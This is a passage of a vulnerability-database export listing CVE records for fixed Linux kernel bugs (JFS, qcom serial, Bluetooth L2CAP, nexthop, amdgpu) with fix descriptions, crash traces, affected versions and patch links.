"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.189",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.107",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.47",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\njfs: fix null ptr deref in dtInsertEntry\n\n[syzbot reported]\ngeneral protection fault, probably for non-canonical address 0xdffffc0000000001: 0000 [#1] PREEMPT SMP KASAN PTI\nKASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f]\nCPU: 0 PID: 5061 Comm: syz-executor404 Not tainted 6.8.0-syzkaller-08951-gfe46a7dd189e #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024\nRIP: 0010:dtInsertEntry+0xd0c/0x1780 fs/jfs/jfs_dtree.c:3713\n...\n[Analyze]\nIn dtInsertEntry(), when the pointer h has the same value as p, after writing\nname in UniStrncpy_to_le(), p-\u003eheader.flag will be cleared. This will cause the\npreviously true judgment \"p-\u003eheader.flag \u0026 BT-LEAF\" to change to no after writing\nthe name operation, this leads to entering an incorrect branch and accessing the\nuninitialized object ih when judging this condition for the second time.\n\n[Fix]\nAfter got the page, check freelist first, if freelist == 0 then exit dtInsert()\nand return -EINVAL."
}
],
"providerMetadata": {
"dateUpdated": "2025-07-17T16:55:30.201Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f98bf80b20f4a930589cda48a35f751a64fe0dc2"
},
{
"url": "https://git.kernel.org/stable/c/53023ab11836ac56fd75f7a71ec1356e50920fa9"
},
{
"url": "https://git.kernel.org/stable/c/6ea10dbb1e6c58384136e9adfd75f81951e423f6"
},
{
"url": "https://git.kernel.org/stable/c/9c2ac38530d1a3ee558834dfa16c85a40fd0e702"
},
{
"url": "https://git.kernel.org/stable/c/ce6dede912f064a855acf6f04a04cbb2c25b8c8c"
}
],
"title": "jfs: fix null ptr deref in dtInsertEntry",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-44939",
"datePublished": "2024-08-26T11:20:44.129Z",
"dateReserved": "2024-08-21T05:34:56.664Z",
"dateUpdated": "2025-07-17T16:55:30.201Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48871 (GCVE-0-2022-48871)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tty: serial: qcom-geni-serial: fix slab-out-of-bounds on RX FIFO buffer
Driver's probe allocates memory for RX FIFO (port->rx_fifo) based on
default RX FIFO depth, e.g. 16. Later during serial startup the
qcom_geni_serial_port_setup() updates the RX FIFO depth
(port->rx_fifo_depth) to match real device capabilities, e.g. to 32.
The RX UART handle code will read "port->rx_fifo_depth" number of words
into "port->rx_fifo" buffer, thus exceeding the bounds. This can be
observed in certain configurations with Qualcomm Bluetooth HCI UART
device and KASAN:
Bluetooth: hci0: QCA Product ID :0x00000010
Bluetooth: hci0: QCA SOC Version :0x400a0200
Bluetooth: hci0: QCA ROM Version :0x00000200
Bluetooth: hci0: QCA Patch Version:0x00000d2b
Bluetooth: hci0: QCA controller version 0x02000200
Bluetooth: hci0: QCA Downloading qca/htbtfw20.tlv
bluetooth hci0: Direct firmware load for qca/htbtfw20.tlv failed with error -2
Bluetooth: hci0: QCA Failed to request file: qca/htbtfw20.tlv (-2)
Bluetooth: hci0: QCA Failed to download patch (-2)
==================================================================
BUG: KASAN: slab-out-of-bounds in handle_rx_uart+0xa8/0x18c
Write of size 4 at addr ffff279347d578c0 by task swapper/0/0
CPU: 0 PID: 0 Comm: swapper/0 Not tainted 6.1.0-rt5-00350-gb2450b7e00be-dirty #26
Hardware name: Qualcomm Technologies, Inc. Robotics RB5 (DT)
Call trace:
dump_backtrace.part.0+0xe0/0xf0
show_stack+0x18/0x40
dump_stack_lvl+0x8c/0xb8
print_report+0x188/0x488
kasan_report+0xb4/0x100
__asan_store4+0x80/0xa4
handle_rx_uart+0xa8/0x18c
qcom_geni_serial_handle_rx+0x84/0x9c
qcom_geni_serial_isr+0x24c/0x760
__handle_irq_event_percpu+0x108/0x500
handle_irq_event+0x6c/0x110
handle_fasteoi_irq+0x138/0x2cc
generic_handle_domain_irq+0x48/0x64
If the RX FIFO depth changes after probe, be sure to resize the buffer.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48871",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:05:28.910017Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:54.202Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/qcom_geni_serial.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "894681682dbefdad917b88f86cde1069140a047a",
"status": "affected",
"version": "f9d690b6ece7ec9a6ff6b588df95a010ab2d66f9",
"versionType": "git"
},
{
"lessThan": "cb53a3366eb28fed67850c80afa52075bb71a38a",
"status": "affected",
"version": "f9d690b6ece7ec9a6ff6b588df95a010ab2d66f9",
"versionType": "git"
},
{
"lessThan": "fd524ca7fe45b8a06dca2dd546d62684a9768f95",
"status": "affected",
"version": "f9d690b6ece7ec9a6ff6b588df95a010ab2d66f9",
"versionType": "git"
},
{
"lessThan": "b8caf69a6946e18ffebad49847e258f5b6d52ac2",
"status": "affected",
"version": "f9d690b6ece7ec9a6ff6b588df95a010ab2d66f9",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/qcom_geni_serial.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.7"
},
{
"lessThan": "5.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.165",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.90",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.8",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntty: serial: qcom-geni-serial: fix slab-out-of-bounds on RX FIFO buffer\n\nDriver\u0027s probe allocates memory for RX FIFO (port-\u003erx_fifo) based on\ndefault RX FIFO depth, e.g. 16. Later during serial startup the\nqcom_geni_serial_port_setup() updates the RX FIFO depth\n(port-\u003erx_fifo_depth) to match real device capabilities, e.g. to 32.\n\nThe RX UART handle code will read \"port-\u003erx_fifo_depth\" number of words\ninto \"port-\u003erx_fifo\" buffer, thus exceeding the bounds. This can be\nobserved in certain configurations with Qualcomm Bluetooth HCI UART\ndevice and KASAN:\n\n Bluetooth: hci0: QCA Product ID :0x00000010\n Bluetooth: hci0: QCA SOC Version :0x400a0200\n Bluetooth: hci0: QCA ROM Version :0x00000200\n Bluetooth: hci0: QCA Patch Version:0x00000d2b\n Bluetooth: hci0: QCA controller version 0x02000200\n Bluetooth: hci0: QCA Downloading qca/htbtfw20.tlv\n bluetooth hci0: Direct firmware load for qca/htbtfw20.tlv failed with error -2\n Bluetooth: hci0: QCA Failed to request file: qca/htbtfw20.tlv (-2)\n Bluetooth: hci0: QCA Failed to download patch (-2)\n ==================================================================\n BUG: KASAN: slab-out-of-bounds in handle_rx_uart+0xa8/0x18c\n Write of size 4 at addr ffff279347d578c0 by task swapper/0/0\n\n CPU: 0 PID: 0 Comm: swapper/0 Not tainted 6.1.0-rt5-00350-gb2450b7e00be-dirty #26\n Hardware name: Qualcomm Technologies, Inc. Robotics RB5 (DT)\n Call trace:\n dump_backtrace.part.0+0xe0/0xf0\n show_stack+0x18/0x40\n dump_stack_lvl+0x8c/0xb8\n print_report+0x188/0x488\n kasan_report+0xb4/0x100\n __asan_store4+0x80/0xa4\n handle_rx_uart+0xa8/0x18c\n qcom_geni_serial_handle_rx+0x84/0x9c\n qcom_geni_serial_isr+0x24c/0x760\n __handle_irq_event_percpu+0x108/0x500\n handle_irq_event+0x6c/0x110\n handle_fasteoi_irq+0x138/0x2cc\n generic_handle_domain_irq+0x48/0x64\n\nIf the RX FIFO depth changes after probe, be sure to resize the buffer."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:12.205Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/894681682dbefdad917b88f86cde1069140a047a"
},
{
"url": "https://git.kernel.org/stable/c/cb53a3366eb28fed67850c80afa52075bb71a38a"
},
{
"url": "https://git.kernel.org/stable/c/fd524ca7fe45b8a06dca2dd546d62684a9768f95"
},
{
"url": "https://git.kernel.org/stable/c/b8caf69a6946e18ffebad49847e258f5b6d52ac2"
}
],
"title": "tty: serial: qcom-geni-serial: fix slab-out-of-bounds on RX FIFO buffer",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48871",
"datePublished": "2024-08-21T06:10:01.859Z",
"dateReserved": "2024-07-16T11:38:08.921Z",
"dateUpdated": "2025-05-04T08:25:12.205Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36013 (GCVE-0-2024-36013)
Vulnerability from cvelistv5
Published
2024-05-23 07:03
Modified
2025-05-04 09:10
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: L2CAP: Fix slab-use-after-free in l2cap_connect()
Extend a critical section to prevent chan from early freeing.
Also make the l2cap_connect() return type void. Nothing is using the
returned value but it is ugly to return a potentially freed pointer.
Making it void will help with backports because earlier kernels did use
the return value. Now the compile will break for kernels where this
patch is not a complete fix.
Call stack summary:
[use]
l2cap_bredr_sig_cmd
l2cap_connect
┌ mutex_lock(&conn->chan_lock);
│ chan = pchan->ops->new_connection(pchan); <- alloc chan
│ __l2cap_chan_add(conn, chan);
│ l2cap_chan_hold(chan);
│ list_add(&chan->list, &conn->chan_l); ... (1)
└ mutex_unlock(&conn->chan_lock);
chan->conf_state ... (4) <- use after free
[free]
l2cap_conn_del
┌ mutex_lock(&conn->chan_lock);
│ foreach chan in conn->chan_l: ... (2)
│ l2cap_chan_put(chan);
│ l2cap_chan_destroy
│ kfree(chan) ... (3) <- chan freed
└ mutex_unlock(&conn->chan_lock);
==================================================================
BUG: KASAN: slab-use-after-free in instrument_atomic_read
include/linux/instrumented.h:68 [inline]
BUG: KASAN: slab-use-after-free in _test_bit
include/asm-generic/bitops/instrumented-non-atomic.h:141 [inline]
BUG: KASAN: slab-use-after-free in l2cap_connect+0xa67/0x11a0
net/bluetooth/l2cap_core.c:4260
Read of size 8 at addr ffff88810bf040a0 by task kworker/u3:1/311
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-36013",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-23T16:10:59.613631Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:47:42.167Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:30:11.584Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cfe560c7050bfb37b0d2491bbe7cd8b59e77fdc5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/826af9d2f69567c646ff46d10393d47e30ad23c6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4d7b41c0e43995b0e992b9f8903109275744b658"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/05/30/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/05/30/1"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/bluetooth/l2cap_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "cfe560c7050bfb37b0d2491bbe7cd8b59e77fdc5",
"status": "affected",
"version": "73ffa904b78287f6acf8797e040150aa26a4af4a",
"versionType": "git"
},
{
"lessThan": "826af9d2f69567c646ff46d10393d47e30ad23c6",
"status": "affected",
"version": "73ffa904b78287f6acf8797e040150aa26a4af4a",
"versionType": "git"
},
{
"lessThan": "4d7b41c0e43995b0e992b9f8903109275744b658",
"status": "affected",
"version": "73ffa904b78287f6acf8797e040150aa26a4af4a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/bluetooth/l2cap_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.0"
},
{
"lessThan": "3.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.32",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.32",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.11",
"versionStartIncluding": "3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: L2CAP: Fix slab-use-after-free in l2cap_connect()\n\nExtend a critical section to prevent chan from early freeing.\nAlso make the l2cap_connect() return type void. Nothing is using the\nreturned value but it is ugly to return a potentially freed pointer.\nMaking it void will help with backports because earlier kernels did use\nthe return value. Now the compile will break for kernels where this\npatch is not a complete fix.\n\nCall stack summary:\n\n[use]\nl2cap_bredr_sig_cmd\n l2cap_connect\n \u250c mutex_lock(\u0026conn-\u003echan_lock);\n \u2502 chan = pchan-\u003eops-\u003enew_connection(pchan); \u003c- alloc chan\n \u2502 __l2cap_chan_add(conn, chan);\n \u2502 l2cap_chan_hold(chan);\n \u2502 list_add(\u0026chan-\u003elist, \u0026conn-\u003echan_l); ... (1)\n \u2514 mutex_unlock(\u0026conn-\u003echan_lock);\n chan-\u003econf_state ... (4) \u003c- use after free\n\n[free]\nl2cap_conn_del\n\u250c mutex_lock(\u0026conn-\u003echan_lock);\n\u2502 foreach chan in conn-\u003echan_l: ... (2)\n\u2502 l2cap_chan_put(chan);\n\u2502 l2cap_chan_destroy\n\u2502 kfree(chan) ... (3) \u003c- chan freed\n\u2514 mutex_unlock(\u0026conn-\u003echan_lock);\n\n==================================================================\nBUG: KASAN: slab-use-after-free in instrument_atomic_read\ninclude/linux/instrumented.h:68 [inline]\nBUG: KASAN: slab-use-after-free in _test_bit\ninclude/asm-generic/bitops/instrumented-non-atomic.h:141 [inline]\nBUG: KASAN: slab-use-after-free in l2cap_connect+0xa67/0x11a0\nnet/bluetooth/l2cap_core.c:4260\nRead of size 8 at addr ffff88810bf040a0 by task kworker/u3:1/311"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:10:30.158Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/cfe560c7050bfb37b0d2491bbe7cd8b59e77fdc5"
},
{
"url": "https://git.kernel.org/stable/c/826af9d2f69567c646ff46d10393d47e30ad23c6"
},
{
"url": "https://git.kernel.org/stable/c/4d7b41c0e43995b0e992b9f8903109275744b658"
}
],
"title": "Bluetooth: L2CAP: Fix slab-use-after-free in l2cap_connect()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36013",
"datePublished": "2024-05-23T07:03:07.571Z",
"dateReserved": "2024-05-17T13:50:33.153Z",
"dateUpdated": "2025-05-04T09:10:30.158Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42283 (GCVE-0-2024-42283)
Vulnerability from cvelistv5
Published
2024-08-17 09:08
Modified
2025-05-04 09:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: nexthop: Initialize all fields in dumped nexthops
struct nexthop_grp contains two reserved fields that are not initialized by
nla_put_nh_group(), and carry garbage. This can be observed e.g. with
strace (edited for clarity):
# ip nexthop add id 1 dev lo
# ip nexthop add id 101 group 1
# strace -e recvmsg ip nexthop get id 101
...
recvmsg(... [{nla_len=12, nla_type=NHA_GROUP},
[{id=1, weight=0, resvd1=0x69, resvd2=0x67}]] ...) = 52
The fields are reserved and therefore not currently used. But as they are, they
leak kernel memory, and the fact they are not just zero complicates repurposing
of the fields for new ends. Initialize the full structure.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 430a049190de3c9e219f43084de9f1122da04570 Version: 430a049190de3c9e219f43084de9f1122da04570 Version: 430a049190de3c9e219f43084de9f1122da04570 Version: 430a049190de3c9e219f43084de9f1122da04570 Version: 430a049190de3c9e219f43084de9f1122da04570 Version: 430a049190de3c9e219f43084de9f1122da04570 Version: 430a049190de3c9e219f43084de9f1122da04570 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42283",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:11:29.775671Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:05.278Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv4/nexthop.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "fd06cb4a5fc7bda3dea31712618a62af72a1c6cb",
"status": "affected",
"version": "430a049190de3c9e219f43084de9f1122da04570",
"versionType": "git"
},
{
"lessThan": "5cc4d71dda2dd4f1520f40e634a527022e48ccd8",
"status": "affected",
"version": "430a049190de3c9e219f43084de9f1122da04570",
"versionType": "git"
},
{
"lessThan": "9e8f558a3afe99ce51a642ce0d3637ddc2b5d5d0",
"status": "affected",
"version": "430a049190de3c9e219f43084de9f1122da04570",
"versionType": "git"
},
{
"lessThan": "1377de719652d868f5317ba8398b7e74c5f0430b",
"status": "affected",
"version": "430a049190de3c9e219f43084de9f1122da04570",
"versionType": "git"
},
{
"lessThan": "7704460acd7f5d35eb07c52500987dc9b95313fb",
"status": "affected",
"version": "430a049190de3c9e219f43084de9f1122da04570",
"versionType": "git"
},
{
"lessThan": "a13d3864b76ac87085ec530b2ff8e37482a63a96",
"status": "affected",
"version": "430a049190de3c9e219f43084de9f1122da04570",
"versionType": "git"
},
{
"lessThan": "6d745cd0e9720282cd291d36b9db528aea18add2",
"status": "affected",
"version": "430a049190de3c9e219f43084de9f1122da04570",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv4/nexthop.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: nexthop: Initialize all fields in dumped nexthops\n\nstruct nexthop_grp contains two reserved fields that are not initialized by\nnla_put_nh_group(), and carry garbage. This can be observed e.g. with\nstrace (edited for clarity):\n\n # ip nexthop add id 1 dev lo\n # ip nexthop add id 101 group 1\n # strace -e recvmsg ip nexthop get id 101\n ...\n recvmsg(... [{nla_len=12, nla_type=NHA_GROUP},\n [{id=1, weight=0, resvd1=0x69, resvd2=0x67}]] ...) = 52\n\nThe fields are reserved and therefore not currently used. But as they are, they\nleak kernel memory, and the fact they are not just zero complicates repurposing\nof the fields for new ends. Initialize the full structure."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:25:54.051Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/fd06cb4a5fc7bda3dea31712618a62af72a1c6cb"
},
{
"url": "https://git.kernel.org/stable/c/5cc4d71dda2dd4f1520f40e634a527022e48ccd8"
},
{
"url": "https://git.kernel.org/stable/c/9e8f558a3afe99ce51a642ce0d3637ddc2b5d5d0"
},
{
"url": "https://git.kernel.org/stable/c/1377de719652d868f5317ba8398b7e74c5f0430b"
},
{
"url": "https://git.kernel.org/stable/c/7704460acd7f5d35eb07c52500987dc9b95313fb"
},
{
"url": "https://git.kernel.org/stable/c/a13d3864b76ac87085ec530b2ff8e37482a63a96"
},
{
"url": "https://git.kernel.org/stable/c/6d745cd0e9720282cd291d36b9db528aea18add2"
}
],
"title": "net: nexthop: Initialize all fields in dumped nexthops",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42283",
"datePublished": "2024-08-17T09:08:49.866Z",
"dateReserved": "2024-07-30T07:40:12.262Z",
"dateUpdated": "2025-05-04T09:25:54.051Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43908 (GCVE-0-2024-43908)
Vulnerability from cvelistv5
Published
2024-08-26 10:11
Modified
2025-09-16 08:02
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: Fix the null pointer dereference to ras_manager
Check ras_manager before using it
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43908",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:28:26.961278Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:56.755Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
